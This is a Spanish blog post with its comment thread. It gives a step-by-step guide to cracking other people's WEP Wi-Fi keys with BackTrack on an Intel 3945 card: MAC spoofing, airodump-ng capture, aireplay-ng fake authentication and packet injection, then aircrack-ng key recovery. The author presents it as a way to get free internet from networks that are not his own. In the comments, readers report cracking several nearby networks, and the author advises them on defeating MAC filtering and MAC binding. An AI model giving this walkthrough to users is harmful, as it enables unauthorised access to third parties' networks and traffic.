Rompiendo WEP con la tarjeta Intel 3945 Uno de mis primeros post (para ser exacto el séptimo) fue el mostrar cómo Romper claves WEP, y comenzaron a preguntarme si era necesaria otra tarjeta para poder hacer el procedimiento, a lo cual para mi desconocimiento amplio en esos momento sobre el tema era que si, era completamente necesaria otra tarjeta inalámbrica compatible con la distribución de Linux Backtrack para poder vulnerar la clave de seguridad WEP, que la mayoría de los usuarios promedio usan en sus routers, ya sea porque viene por default o no conocen otras opciones para proteger el acceso a sus redes inalámbricas.
En esta semana requería forzosamente segunda red con internet porque a la red que estaba conectado estaba MUY lenta, y me volvió a entrar la duda de cómo obtener la clave si no traía mi tarjeta inalámbrica externa, después de 2 horas de ardua lectura de la documentación del Backtrack y unos cuántos blogs, encontré la manera de aplicar un método INFALIBLE a pesar de poca señal inclusive, y lo mejor de todo… con la tarjeta que la mayoría de las portátiles trae… la Intel 3945abg.
Lo que necesitamos es:
- Distribución de Linux Backtrack.
- Un equipo con tarjeta Intel 3945 (que a partir de cierto paso es igual para casi todas las demás tarjetas sólo que sean capaces de inyectar paquetes)
Teniendo esto comenzamos booteando nuestro equipo con la distribución de Backtrack y elegimos la opción de gráficos KDE.
UPDATE: Al momento de escribir código (no los números) pueden ir pulsando la tecla TAB (tabulador, la de las flechas en ambas direcciones) para que les complete los comandos y no suframos escribiendo estríctamente todo el código letra por letra y nos equivoquemos en el camino, sólo es necesario pulsar las letras iniciales y pulsar TAB para que complete el código.
Enseguida podremos verificar si tenemos una tarjeta Intel 3945abg con el siguiente comando:
lspci | grep Netowrk
Mostrándonos que efectivamente tenemos esa tarjeta
0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev02)
Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos comandos:
rmmod iwl3945
modprobe ipwraw
A partir de este paso, las instrucciones son las mismas para la mayoría del resto de las tarjetas.
Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta, que será la que NO nos marque “no wireless extensions“, que en mi caso le llama wifi0:
iwconfig
Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a habilitar:
airmon-ng stop wifi down
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:
airodump-ng wifi0
Ya exploradas todas las redes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID, ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de inyección de paquetes para romper su seguridad con este código:
airodump-ng -c (canal de transmisión, columna CH) -w (nombre del archivo de captura) –bssid (MAC del router de red destino que copiamos) wifi0
Lo que para mi ejemplo quedó así:
airodump-ng -c 3 -w jafrancov –bssid 00:21:7C:D0:71:89 wifi0
Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router, si esta es correcta nos regresará una carita feliz como esta –> : – )
aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0
Para mi ejemplo:
aireplay-ng -1 0 -a 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0
Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado ” enter” nos preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla ‘Y’ y damos enter, para que inicie el proceso:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0
Para mi ejemplo:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0
Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna “#Data” comience a aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:
aircrack-ng (Nombre que dieron al archivo de captura)-01.cap
Nueva y por última vez para mi ejemplo:
aircrack-ng jafrancov-01.cap
Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que es lo mismo que el número de la columna ‘#Data’, pasados los 160,000 es 100% probable que obtengamos una clave WEP común de 64 bits hexadecimal, en lo personal he visto una tendencia de usuarios a usar sólo números, así que a partir de los 10,000 IVs es bueno comenzar a probar, cuando sea descubierta la clave nos lanzará un texto que dice “KEY FOUND! [Clave]“, ese número es la clave WEP que nos pide el router al intentar conectarnos.
Este método lo usé ya con varias redes incluyendo de las de menor señal y aún así se pudo obtener la clave y libre acceso a internet y la red local del router como se puede ver en la imagen:
No me queda más que recomendar cambiar de protocolo de seguridad a WPA por ejemplo, que hasta el momento es de los más seguros para redes inalámbricas, disfruten el post y puede ser una buena opción cuando se requiere de urgencia tener internet… je
Enjoy this Life!!
Quizá también te interese...
160 Responses to “Rompiendo WEP con la tarjeta Intel 3945”
Trackbacks/Pingbacks
- La seguridad WEP en Wifi « Lógicamente todo no es lógico - [...] http://www.freewebs.com/thebyber/crackearwep.htm http://foro.el-hacker.com/index.php/topic,169792.0.html http://jafrancov.com/es/2009/07/rompiendo-wep-con-la-tarjeta-intel-3945/ [...]
- Romper seguridad de redes inalámbricas (WiFi) con tu iPod Touch o iPhone | Alex Franco - [...] en un anterior post comenté lo fácil que era romper claves WEP con la tarjeta Intel 3945abg, bien ahora ...
muy buen aporte
si puedo recibir ayuda sobre este tema se los agradeceria de antemano ya que yo soy muy nuevo en esto… como en donde podria descargar el back track full rip o super comprimido
x cierto que mi cuate ps no uso el back track sino WIFI… q naa q ver con el back track… m pueden decir cual es la diferencia? y de lo q me di cuenta s d que los comandos de consola son pareci2. como airdump o algo asi… agradesco el tiempo dedicado para leer esto y tambien la ayuda que podrian brindarme… mi correo es aqu66@hotmail.com
EL HOMBRE SE PLANTEA LOS LIMITES, PERO EL HOMBRE TMBIEN LOS SOBREPASA…
Hola Alex,
Im-presionante la dedicación y paciencia, y evidentemente el contenido!
He estado probando con una 2200 sin éxito, pero te explico a ver si tu lo ves claro.
La verdad es que soy un profano en el Linux (aunque me has hecho intrigarme en él), osea que alomejor se me ha colao “algo” y ni me he enterado.
Lo estoy probando con una WLAN de la que ya tengo la contraseña, para “asegurar” el tiro.
Sobre lo que comentan algunos de la sintaxis, a mi tambien me ha pasado, pero poniendo algún “-” más en algun sitio, e investigando alguna cosa, pues tira palante.
Con el maccchanger creo recordar que tambien cambié alguna cosa.
Empiezo directamente con el 1er problema que he tenido.
Al hacer el “modprobe ipwraw” y luego mirar el “iwconfig”, no me aparecía la wifi, por lo que miré por ahí y en la web “http://geekcity.wordpress.com/2008/05/20/wep-cracking-con-ipw2200/” encontré alguien que se había peleado con esta targeta.
Lo que hice entonces es poner “modprobe ipw2200 rtap_iface=1″ en vez de “modprobe ipwraw” y palante.
A partir de ahi viene cuando algo sale y algo no.
Al hacer “aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0″ con mi red (eth1), intenta autentificarse unas cuantas veces, sin conseguirlo, y al final me dice que no puede. A partir de aquí no sé si ya no es necesario continuar hasta que deje de salir ese mensaje.
Ah, y lo que dices de:
Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router, si esta es correcta nos regresará una carita feliz como esta –> : – )
No me sale nunca (supongo que mientras no se autentifique nada de nada…?).
Pero no se más.
Gracias tocayo!
Jandro
hola colega, solo una pregunta realizo todo bien hasta que llego a la asociacion al router pero no consigo que me conecte y empieze a enviar datos, eso porque puede ser????
@amper Puedes describir un poco más lo que estás haciendo, pueden ser 2 cosas, que no haya nadie conectado al router, o que la MAC del router esté incorrecta
Saludos…
Hola!
Muchas gracias por el tutorial para tarjetas 3945, me ha servido mucho, es muy claro y las imágenes son de muy buena calidad. Hasta ahorita he podido obtener 6 claves WEPs, de 37 posibles redes disponibles, quiero preguntarte si hay una manera de unir esas redes para crear una “Megaconexión”, he leído al respecto y no entiendo mucho la verdad, sólo que necesito más hadware, te agradacería tu opinión al respecto.
Muchas gracias por el tuto.
Atte.
Jorge
@JorgeEduardo Hola, gracias por tus comentarios, y con respecto a tu pregunta… si se puede hacer una “megaconexión” pero todo dependerá del hardware que tengas disponible, ya que hasta el momento (que yo conozca claro) sólo puedes realizar una conexión por cada tarjeta de red que cuentes, es decir por cada red que te quieras conectar necesitas una tarjeta independiente. Espero haya respondido a tu pregunta…
Saludos…
Hola de nuevo
OK, que tarjetas me recomiendas comprar, no conozco al respecto, he leído por ahí que con otro router inalámbrico se puede, pero mis conocimiento son muy básicos al respecto, además de que tengo que mejorar la recepción de la señal wifi con una antena casera.
Gracias por la info.
Lo he conseguido con varias redes, pero hay una con buena señal wep en la que no se mueve la columna DATA lo he intentado varias veces y nada ¿por qué? Gracias
Puede ser por probables 3 cosas,
1) Asegúrate que sea seguridad WEP y no WPA, en caso que si se WEP olvida esto
2) Asegúrate que existan otros equipos conectados a la red, eso te darás cuenta en la parte baja de cuando se envían los paquetes, si hay información en esa parte, sólo queda una opción más
3) Que el router tenga seguridad WEP más filtrado por MAC, esto quiere decir que necesitas conocer la MAC (dirección física xx:xx:xx:xx:xx:xx) de un equipo autenticado o conectado a la red, la cuál no es tan sencilla de obtener, pero si te aparece en la parte de datos una MAC de un equipo, al momento de hacer el macchanger pon esa MAC y tendrás acceso
Saludos…
Hola, espero se encuentren bien, por otra parte, quisiera saber si esto funciona haciendolo desde una iBook o una iMac.
Saludos
No estoy seguro, pero… se podrá hacer con una máquina virtual de VMWare o en su caso booteando normal, pero, las mac (ninguna) trae la tarjeta intel 3945abg, así que necesitará una tarjeta wifi externa USB, y seguir algo como este tutorial http://jafrancov.blogspot.com/2008/10/rompiendo-claves-wep.html
Saludos…
el link para bajar el BackTrack a cambiado:
http://www.backtrack-linux.org/downloads/
batalle un poco para encontrarlo, por favor actualiza ese link a tu post…
=D y fuera del tema, te queria preguntar, como tienes tu propio dominio (jafrancov.com) es que me gustaria tener el mio.
gracias, y felicidades por tu blog XD
Ohhh :O muchas gracias por el feedback y el dominio pues… lo compras con un prestador de esos servicios, como GoDaddy, Dreamhost, Neubox y un largo etcétera, aparte del dominio (el nombre) necesitas hosting (donde guardar todo el sitio) que los mismo que mencioné te pueden servir. Gracias por comentar…
Saludos =D
hola esta excelente esto gracias!!
disculpa sirve con una “Intel Wireless WiFi Link 4965AGN”
que tendria que hacer para el monitoreo e inyeccion de paquetes???
o bueno antes de los pasos para la mayoría del resto de las tarjetas???
agradezco tu ayuda gracias
@danniel9 Hola Daniel, grx por tu comentario, mira, yo no he tenido la oportunidad de probar con muchas tarjetas intel, incluyendo la de tu pregunta, he probado con externas con chips ralink, linksys, entre otras, te recomiendo lo intentes a partir de la segunda imagen, que son los pasos genéricos para casi cualquier otra tarjeta, aún sigo buscando solución para poder hacerlo con cualquier tarjeta, espero pronto tenerlo.
Saludos!!
This will be significant!|I attempt to depict similar soulful information
Amigo felicitaciones por tu pag, me parece que explicas todo muy bien. Sin embargo tengo una duda.
Sigo todos tus pasos, logro una autentificacion exitosa, pero al momento de colocar este comando:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0
Claro con sus respectivos cambios, como la mac de origen y destino. simplemento al dar ENTER me aparece es READ paquets y el numero de paquetes va en ascenso, no logro apreciar la pantalla que tu colocas en donde debo pulsar Y. En efecto no logro inyectar paquetas.
Nota: no hay mas usuarios conectados al router dado que pruebo con el mio.
Ups… pequeño detalle ahí, si necesita haber al menos un usuario que esté conectado a esa red para poder autentificarte e inyectar paquetes correctamente =S prueba con cualquier otro dispositivo con WiFi, no necesariamente una computadora, espero tengas éxito, Saludos!!
No existe alguna forma de realizar la inyeccion sin usuarios conectados a la red?
@José hasta el momento yo no lo he logrado, lo q a veces he hecho y funciona es abrir 2 terminales haciendo la inyección, así simulas que hay alguien más, pero no siempre funciona =S
Franco, gracias por responder. Cuando te refieres a dos terminales, hablamos de dos pc corriendo backtrack y que me autentifique con cada una de ellas?
Amigo todo calidad, pero tengo uan duda al final cuando empieza la inyeccion de paquetes ya llevo ponte 43000 paquetes inyectados, pero la columna #data nada que se mueve tiene como 9 nada mas. ¿que puede estar pasando?
@Alejandro ahmmm quizá tienes el mismo problema que @Jose, te has asegurado que haya alguien conectado a la red?? la mayoría de las veces que no inyecta es por esa razón… saludos y éxito!!
Se encuentra dentro de los temas que me interesan, pero nose si puedo realizarlo en mi pc. Soy analfabeta en esto de descargar programas y nose mucho de computadoras, por eso te pediria que me ayudes por favor. Yo tengo una lapto aspire one de 10.1”. Será q cumple con lo que se necesita.
Bueno si tines tiempito porfa ayudame, y de todos modos ¡gracias!!!
@Joha Ouch… necesitaría saber el modelo de tu tarjeta inalámbrica, consigue un programa que se llama Everest y te da el resumen de hardware de tu máquina, si me das el modelo de la tarjeta quizá pueda ayudarte, saludos!!
Yo queria saber si solo es con esa tarjeta ya que yo tengo una intel 4965AGN me servira igual o no??
Bueno espero tu resp……..
@Cristian Estoy buscando alguna version que evite todo este rollo y dar la opción para que puedan hacerlo con cualquier tarjeta, si se puede con la 4965AGN pero, desconozco si es automático, intenta hacer el iwconfig y verifica, si aparace entonces continúa los pasos a partir de ese comando
No se si seguiras revisando la pagina. Me parece interesantisimo el aporte, por que estoy como loko con la targeta, tambien es la 3945. Hace tiempo consegui que obtuviera paquetes pero ya no recuerdo como lo hice, fui probando drivers y drivers y utilizaba el omnipeek. Soy un cateto en esto, y queria saber si con vista puedo utilizar el backtrack, por q me pone no bootable partiton in table. Solo funciona en linux no?? tendria que instalar el wmware?? espero tu respuesta. estoy perdisimo.
@maik jaja si sigo revisando mi sitio, puedes hacer 2 cosas, grabar el backtrack en un disco o una USB, no te dejará hacerlo desde VMWare ya que necesita reconocer directamente la tarjeta de red, reinicias la computadora y le indicas que arranque con el disco o la USB, una vez que esté hecho eso, sigues los pasos del tutorial y así tendrás éxito. Saludos!!
yo me pregutaba una vez enganchdo al red si pueden ver lo q navegas por internet si tu mail o las paginas q visitas o lo q te descargas.
Gracias por responder lo explicas bien y buen trabajo.
@Jorge No, no pueden verla a menos que tengan equipos o software avanzado para analizar el tráfico que corre, o en su caso que te hayan instalado un programa que les deja hacer conexión con tu máquina, y por ciero gracias!! =D
Una pregunta este, despues de entrar a la red, como consigo el numero de ip y la puerta de en lace y los DNS. Yo logre entrar a una red pero con la opcion de “ip automatico” solo me puso un ip y la mascara de subred, pero no tenia puerta de enlace asi que no tenia internet ni nada. Como puedo averiguar esos datos porfa? Gracias de antemano y todo lo q explicaste me salio bien hasta la parte de “autentificacion/asociacion” q no lo logre, pero igual capture la contraseña, el unico problema es con la puerta de enlace :p Gracias de antemano
@J-S Si te dio una IP 169.lodemas es que no hizo una autenticación, es necesario realizar todos los pasos, la dirección que te debe de dar es 192.168.1.# o una 172.16.1.# de otra manera no estás siendo conectado a la red, si no te hizo autenticación es porque no hay usuarios conectados a esa red, para que te pueda dar resultado requieres forzosamente que se haga lo de la autenticación, si no, te traerá una clave errónea, creyendo que es correcta con respecto al paquete que precisamente en ese momento envió… realiza nuevamente el proceso, y asegúrate que haya al menos un usuario conectado (eso se ve en la parte baja del airodump) saludos!!
Gracias por la respuesta, justo acabo de hacer todo de nuevo. Aunque no hay autentificacion me logra dar una contraseña, entro por windows a la red con esa contraseña y aparece como conectado. Buscando en otros lados vi que por medio del ethereal logro revisar los paquetes enviados y me sale como puerta de enlace, o es lo que creo yo la 192.168.6.1 . Le pongo todos los datos con la dns mas utilizada “200.48.225.130″ pero sigue igual. Entro a la red con esa contraseña, estoy dentro, con puerta de enlace q supuestamente es la correcta y nada aun. Hice la autentificacion con usuarios pero tampoco me da respuesta… T_T creo q soy muy salado o algo hice mal? agradecere tu respuesta
Buenas
Tengo un problemilla que no he conseguido resolver, el backtrack no me detecta mi tarjeta inalámbrica, como puedo saber que modelo tengo? un saludo
@Daniel en la terminal escribe antes de todo iwconfig eso te dará el modelo de la tarjeta, o en windows puedes checarlo con el Everest o algún software similar que te arroje una descripción completa del Hardware de tu equipo.
L0 Y ETH0, sólo me detecta esas, no me detecta la wifi ni el bactrack 3 ni el 4 ?¿?¿?¿? estoy con con un macbook con vmware montado
a todas estas, felices fiestas
@Daniel Ok, si es con VMWare necesitas tener una tarjeta adicional, una USB que la detecte y la montes dentro del VMWare, de otra manera solamente tienes las tarjetas locales que instala el Backtrack con el VMWare
Voy a probar sin vmware, a grabar el ISO y t cuento, un saludo
Una vez obtenido la clave, tengo entendido que hay que traducirla.. por favor donde realizo esa traduccion y como hacerlo…, si es en el mismo programa o hay que tenerun programa adicionl.
Les agradecere me ayuden en esto..
@Javier no hay que traducir nada, te da 10 caracteres o 5 en ascii esos los pones a la hora que intentas conectarte y listo!
jaja oe te falta un paso que es para obtener las ips algunos trabajan te piden la ip
@jorge ningún router pide IP, es muy raro, a menos que no tenga un server incluído de DHCP, o a qué te refieres?
a lo que yo me refiero es que despues de eso hay un paso son pocos los que saben eso , por ejemplo en mi caso yo ya hackee un linea y este sevidor da linea a sus clientes con una mac y una ip que el les da “personalmente” ¿como saber esa ip?
@jorge Ahhhhh!! ya te caché!! tiene un MAC binding, mira, cada tarjeta de red tiene un identificador único, una MAC que es compuesta de un número hexadecimal de 6 pares, algo como 11:22:33:dd:ee:ff, lo que se le dice al router es que al encontrar esa MAC le otorgue cierta IP.
Para saber qué rango de IPs si va a estar como un poco complicado, porque no sabes qué subred está ocupando, puedes probar con las más comunes para empezar:
192.168.0.X
172.16.0.X
10.0.0.X
Donde X e un número entre 1 y 254, esperando no esté ocupada dicha IP. El Gateway o Puerta de enlace, puede ser la 1 o la 254. Las máscaras de red deben ser para la primera 255.255.255.0, para la segunda 255.255.0.0 y para la tercera 255.0.0.0
Lamento no poder ayudarte más, pero ahí si le metieron un poco de seguridad adicional =P
Que tal amigos, aver si alguien me puede ayudar con algo.
Yo ya habia logrado romper algunas redes con mi laptop.
Ahora que lo intenté de nuevo, al punto de camuflagera el mac de mi tarjeta me pone un mensaje
macchanger –mac 00:11:22:33:44:55 wifi0
No such device
Y aqui estoy perdido.
@jose Necesitas verificar que tu tarjeta de red se llame wifi0, quizá la está reconociendo con un nombre totalmente diferente, eso arregla el problema
Que tal Franco gracias por tu pronta respuesta.
Aqui dejo un link de la imagen con las intrucciones que doy y recibo, alli viene el nombre de la tarjeta.
http://www.nextlevelhp.com/objetos/snapshot2.png
Saludos.
@jose hola de nuevo, tienes un pequeño error en el comando, debe ser dos guiones, si lo dejas con uno intentará cambiar el nombre de la tarjeta, no de la MAC, debe quedar así:
macchanger –mac 00:11:22:33:44:55 wlan0
Ratero
@Nubi ahmm… gracias?
¿¿Que versión de Linux Backtrack estás usando??, si es la versión 4, que es con la que algunos han tenido broncas, descárgate la versión 3, ya que la 4 aún está en Beta y puede llegar a tener broncas, y otra pregunta, al momento de que haces el “lspci | grep Netowrk” si te muestra que tu tarjeta es la 3945ABG??
Saludos…
¿¿Que versión de Linux Backtrack estás usando??, si es la versión 4, que es con la que algunos han tenido broncas, descárgate la versión 3, ya que la 4 aún está en Beta y puede llegar a tener broncas, y otra pregunta, al momento de que haces el “lspci | grep Netowrk” si te muestra que tu tarjeta es la 3945ABG??
Saludos…
Es correcto @Luna solamente es temporal, mientras estés usando el linux backtrack, al regresar a tu sistema operativo base regresa todo a la normalidad.
Saludos…
Es correcto @Luna solamente es temporal, mientras estés usando el linux backtrack, al regresar a tu sistema operativo base regresa todo a la normalidad.
Saludos…
@Fran en efecto, lo más seguro es que sea eso, puedes checar este post para que no tengas que quemar el iso y lo instales en una memoria USB.
Saludos…
@Fran en efecto, lo más seguro es que sea eso, puedes checar este post para que no tengas que quemar el iso y lo instales en una memoria USB.
Saludos…
@supnet45 Qué versión del Backtrack estás usando?? lo comento porque en el 3 y 4 no pide ni usuario ni contraseña, te recomiendo uses la 3 ya que la 4 está en beta, pero si aún así la pide, el usuario es root y el password es toor.
Saludos…
@supnet45 Qué versión del Backtrack estás usando?? lo comento porque en el 3 y 4 no pide ni usuario ni contraseña, te recomiendo uses la 3 ya que la 4 está en beta, pero si aún así la pide, el usuario es root y el password es toor.
Saludos…